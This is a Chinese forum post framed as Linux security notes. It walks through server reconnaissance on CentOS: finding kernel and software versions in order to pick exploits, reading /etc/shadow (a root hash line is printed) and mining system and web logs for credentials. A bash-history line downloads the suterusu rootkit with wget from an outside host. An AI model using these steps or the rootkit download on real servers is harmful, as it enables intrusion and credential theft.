About Linux 安全套

这两年成长许多,T00LS学习了不少东西，这次确实帐号被禁止了，现在无论如何回来，我会珍惜

以下一切全部是自己臆想而来，如有雷同，不胜荣幸，要下班了，先写一部分，后面还是待时间充裕了补上

关于Linux的病毒查杀,需要吐槽太多内容.

之前搞掉很多rootkit 或者系统干扰病毒后都没有时间来描述查杀过程。

攻防总是相辅相成的，你防的时候必然会知道或者了解攻击手段（尼玛忘了哪个高人说的）

你起码了解自己的服务器运行情况，简单诉说大牛勿喷

[root@localhost~]# lsb_release -a
Description:    CentOS release 5.6(Final)
//系统所用发行版
[root@localhost ~]#uname -a
Linux localhost.localdomain 2.6.18-238.el5PAE
#1 SMP ThuJan 13 17:10:20 EST 2011 i686 i686 i386 GNU/Linux
//系统内核版本2.6.18-238.el5PAE默认打了PAE大内存补丁（关于PAE后面有亮点）系统i686（32位）OK到这里你基本上可以去找针对内核exp了
[root@localhost ~]#ps -aux

//用户开启进程情况,此处获取的信息可以判定用户自有软件目录
[root@localhost ~]#whereis httpd   
httpd: /usr/sbin/httpd.event/usr/sbin/httpd.worker /usr/sbin/httpd /etc/httpd /usr/lib/httpd/usr/share/man/man8/httpd.8.gz
//此处whereis which命令可以判定软件的目录情况
如果安装软件的人权限没设置正确
你懂得...
[root@localhost ~]#/usr/sbin/httpd -v
Server version: Apache/2.2.3
Server built:   Nov 12 2012 08:48:42
//找到软件路径后，基本上所有的程序+（-v）都可以看到版本，这里可以继续找关于软件版本的exp直接秒杀
[root@localhost ~]#id
uid=0(root)
gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel)
//属主和属组
如果是root你还提权个鸟
查查ssh端口
或者备份下面这个文件的第一行
你就可以happy去了.
[root@localhost ~]#more /etc/shadow
root:$1$20OXO7gK$H4Kqym5OoWGUzjOpbjO5/1:15702:0:99999:7:::

日志入手法

[root@localhostlog]# last
p2pcache pts/0       124.207.5.xx     Tue Jan  8 16:14   still logged in
p2pcache pts/0       124.207.5.xx     Tue Jan  8 15:51 - 16:06  (00:15)   
p2pcache pts/0       124.207.5.xx     Tue Jan  8 09:38 - 09:43  (00:04)   
reboot   system boot  2.6.18-238.el5PAMon Jan  7 13:44         (1+03:04)  

root     tty1                         Fri Dec 2815:17 - down   (00:03)   
reboot   system boot  2.6.18-238.el5PAFri Dec 28 15:16          (00:05)   

wtmp begins Fri Dec 28 15:16:11 2012
//last系统重启时间
关机时间
用户登录情况IP等信息，同时有个命令为lastlog每个用户上次登录情况，此命令调用/var/log/lastlog统计情况
[root@localhost httpd]#ls -l /var/log/httpd
total 8
-rw-r--r-- 1 root root 1267 Jan  8 16:53access_log
-rw-r--r-- 1 root root  664 Jan  816:53 error_log
//这个里面一般是神级别的日志（自行更换HTTP服务路径），我不会告诉你某人根据拿到了中国电信BOSS系统一大笔奖金
//我这里默认安装的HTTP大家注意默认权限644任何人可读，你懂得
不多说...
[root@localhost log]#ll /var/log/secure

-rw------- 1 root root 3215 Jan  8 16:27/var/log/secure
//这个文件是系统安全日志ssh尝试登录了，用户新增等各种信息，看了权限就知道600
[root@localhost log]#cat /var/log/cron  
Dec 28 15:17:16 localhost crond[2493]: (CRON)STARTUP (V5.0)
Jan  7 13:44:55 localhost crond[2586]: (CRON)STARTUP (V5.0)
Jan  7 14:01:01 localhost crond[2658]: (root)CMD (run-parts /etc/cron.hourly)
Jan  7 15:01:01 localhost crond[2660]: (root)CMD (run-parts /etc/cron.hourly)
Jan  7 16:01:01 localhost crond[2662]: (root)CMD (run-parts /etc/cron.hourly)
//有点特殊的文件，时间任务系统crond，你所有的计划任务以及执行命令的情况都会体现
//我不告诉你之前根据这个拿到了CP备份目录路径，由于管理的权限不小心，直接搞定整站
[root@localhost log]#tail -f /var/log/messages

Jan  8 16:00:50 localhost yum: Updated:glibc-devel-2.5-81.el5_8.7.i386
Jan  8 16:00:53 localhost yum: Updated:libstdc++-devel-4.1.2-52.el5_8.1.i386
Jan  8 16:00:55 localhost yum: Updated:libxml2-devel-2.6.26-2.1.15.el5_8.6.i386
//你所有除了上面提到的关键日志和服务日志
所有的日志垃圾鸟玩意都会扔到这边
//据前面提到的一些基本命令自行解决。
//例子：某人搞一台centos5.5服务器半年多.就为拿个wordpress皮肤.最后看到了ProFTPD(FTP服务软件)的log
//里面有用户登录情况,尝试错误的密码，看到一个这样的密码7759521zhangfan@!用户尝试了两次都被提示错误.
//然后他用7758521zhangfan@!成功登录帐号,然后
然后就没有然后了...
[root@localhost log]#more/root/.bash_history

wgethttp://lucky.fuzzexp.org/file/r00tk1t/suterusu.tar.gz
//用户历史命令日志
不多说了
大家看到了我下载过这个东东suterusu一个rootkit后门
//吐槽一下，大爷的无法在PAE内核的x86或者X64位上面玩，对实际环境来说，还有毛线用啊（32位系统内存大于4G 需安装PAE内核补丁）